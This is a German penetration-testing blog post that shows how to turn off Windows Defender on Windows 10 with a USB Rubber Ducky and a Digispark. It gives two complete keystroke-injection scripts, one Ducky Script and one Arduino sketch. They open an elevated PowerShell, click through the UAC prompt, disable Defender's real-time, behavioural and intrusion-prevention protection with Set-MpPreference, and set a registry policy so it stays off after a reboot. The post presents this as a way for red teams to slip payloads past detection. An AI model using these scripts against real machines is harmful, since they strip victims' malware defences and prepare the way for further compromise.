Windows Defender abschalten

Die Windows Defender Antivirus-Features wurden in der Vergangenheit ständig verbessert. Der mittels Metasploit-Framework (Msfvenom) erstellte Payload, wird in der Regel zuverlässig erkannt. Für Penetrationstester und Red Teams wird es zunehmend schwerer, den in der Cloud bereitgestellten Schutz einschließlich der verhaltensbasierenden/heuristischen Erkennung zu umgehen.

Für Administratoren existieren eine Reihe von Möglichkeiten, um Windows Defender zu administrieren und die Software den eigenen Anforderungen anzupassen.

Angreifer versuchen zunehmend ihre vorhanden Payloads so abzuändern, dass sie einer Prüfung wiederstehen können. Hier wenden sie neue Methoden für die Verschlüsselung des Codes bzw. des Datenverkehres aber auch der absichtlichen Veränderung von Programmcode (Obfuskation) an.

In diesem Beitrag beschreibe ich, wie Sie mit Hilfe des USB-Rubber-Ducky und Digispark den Windows Defender in Windows 10 abschalten können. Voraussetzung ist, dass der Angreifer/ Penetrationstester lokal Zugang zum Opfer-PC hat und der verwendete Nutzer administrative Rechte auf dem lokalen System besitzt. Dieser Angriff sollte somit in zentral administrierten Netzwerken nicht zum Erfolg führen, da hier der reguläre Nutzer seine Rechten nicht so einfach mit Hilfe der Benutzerkontensteuerung (UAC) eskalieren kann.

In der Literatur und im Internet lassen sich mehrere Möglichkeiten finden, um den Windows Defender abzuschalten. Für dieses Beispiel habe ich die Möglichkeit mittels PowerShell gewählt.

Zur Konfiguration der Windows-Defender Scans und Updates existieren eine Reihe von Parametern, die im Windows IT Pro Center eingesehen werden können. Die hier aufgeführten Optionen sind selbsterklärend.

Das Ducky-Script

Der Befehl in Zeile 10 ruft ein Fenster zur Befehlseingabe auf, das in Zeile 13 die Benutzerkontensteuerung mit Hilfe von Powershell aufruft. In den Zeilen 16 bis 19 wird der Dialog auf „Ja“ gesetzt. Zeile 24 ruft im Ducky-Script folgende Parameter des Moduls Set-MpPreference auf:

  • -DisableRealtimeMonitoring $true
  • -SubmitSamplesConsent NeverSend
  • -DisableIOAVProtection $true
  • -DisableIntrusionPreventionSystem $true
  • -DisableBlockAtFirstSeen $true
  • -DisableBehaviorMonitoring $true
  • -MAPSReporting 0

Der Windows Defender wird nach einem Neustart des PC automatisch wieder eingeschaltet. Um dies zu verhindern, tragen wir in Zeile 29 einen entsprechenden Wert in die Windows Registry ein:

Set-ItemProperty 'HKLM:SOFTWAREPoliciesMicrosoftWindows Defender' DisableAntiSpyware 1

Nach einem Neustart des PC hat der angemeldete Nutzer nun keine Möglichkeit mehr die Einstellungen zum Virenschutz zu ändern. Der folgende Befehl macht diesen Vorgang wieder rückgängig.

Set-ItemProperty 'HKLM:SOFTWAREPoliciesMicrosoftWindows Defender' DisableAntiSpyware 0

[code]
REM Turn off Windows Defender Windows 10 1803
REM Author: Pentestit.de 07/04/2018
REM You take responsibility for any laws you break with this,
REM I simply point out the security flaw
REM
REM Start of script
REM
REM Let the HID enumerate
DELAY 2000
GUI r
DELAY 200
REM Run PowerShell and use UAC to escalate priviliges
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 9000
REM ALT Y should work also
TAB
TAB
ENTER
DELAY 3000
REM Use Set-MpPreference Module
REM find mor information here
REM https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=win10-ps
STRING Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true -DisableBlockAtFirstSeen $true -DisableBehaviorMonitoring $true -MAPSReporting 0
ENTER
DELAY 3000
REM Make sure that Defender will stay off after reboot
REM Set DisableAntiSpyware 0 to turn Defender on again
STRING Set-ItemProperty ‘HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender’ DisableAntiSpyware 1
ENTER
DELAY 1000
STRING exit
ENTER
[/code]

Ducky-Skript muss nun noch für den Einsatz kodiert werden. Ich nutze in diesem Fall das Online-Tool “Duck Toolkit”

 

Das Skript für den Digispark

Für den Digispark benutze ich die selben Befehle zum Abschalten des Windows Defenders. Die Syntax sieht natürlich etwas anders aus, da hier die Arduino Entwicklungsumgebung eingesetzt wird. Weitere Hinweise zur Einrichtung und Nutzung von Arduino finden Sie u.a. hier.

[code]
#include “DigiKeyboardDe.h”

void setup()
{
pinMode(1, OUTPUT); //LED on Model A
}

void loop()

{
DigiKeyboardDe.update();
// DigiKeyboardDe.sendKeyStroke(0);
DigiKeyboardDe.delay(1000);
DigiKeyboardDe.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //minimize all windows
DigiKeyboardDe.delay(2000);
DigiKeyboardDe.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
DigiKeyboardDe.delay(500);
DigiKeyboardDe.println(“powershell Start-Process powershell -Verb runAs”);
DigiKeyboardDe.sendKeyStroke(KEY_ENTER);
DigiKeyboardDe.delay(9000);
DigiKeyboardDe.sendKeyStroke(KEY_J, MOD_ALT_LEFT); // ALT-J
DigiKeyboardDe.delay(3000);
DigiKeyboardDe.println(“Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent Never -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true -DisableBlockAtFirstSeen $true -DisableBehaviorMonitoring $true -MAPSReporting 0”);
DigiKeyboardDe.delay(2000);
digitalWrite(1, HIGH); //turn on led when program finishes
DigiKeyboardDe.delay(3000);
DigiKeyboardDe.println(“Set-ItemProperty ‘HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender’ DisableAntiSpyware 1”);
DigiKeyboardDe.delay(1000);
digitalWrite(1, LOW);
DigiKeyboardDe.println(“exit”);
DigiKeyboardDe.delay(15000);
}
[/code]

In unserem Buch Hacking & Security, das im Rheinwerk Verlag erschienen ist, gehe ich im Kapitel 8 auf weitere Anwendungsmöglichkeiten des USB-Rubber-Ducky, Digispark und Bash Bunny ein.

Schreibe einen Kommentar

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.

Diese Seite verwendet Cookies, um die Nutzerfreundlichkeit zu verbessern. Mit der weiteren Verwendung stimmst du dem zu.

Datenschutzerklärung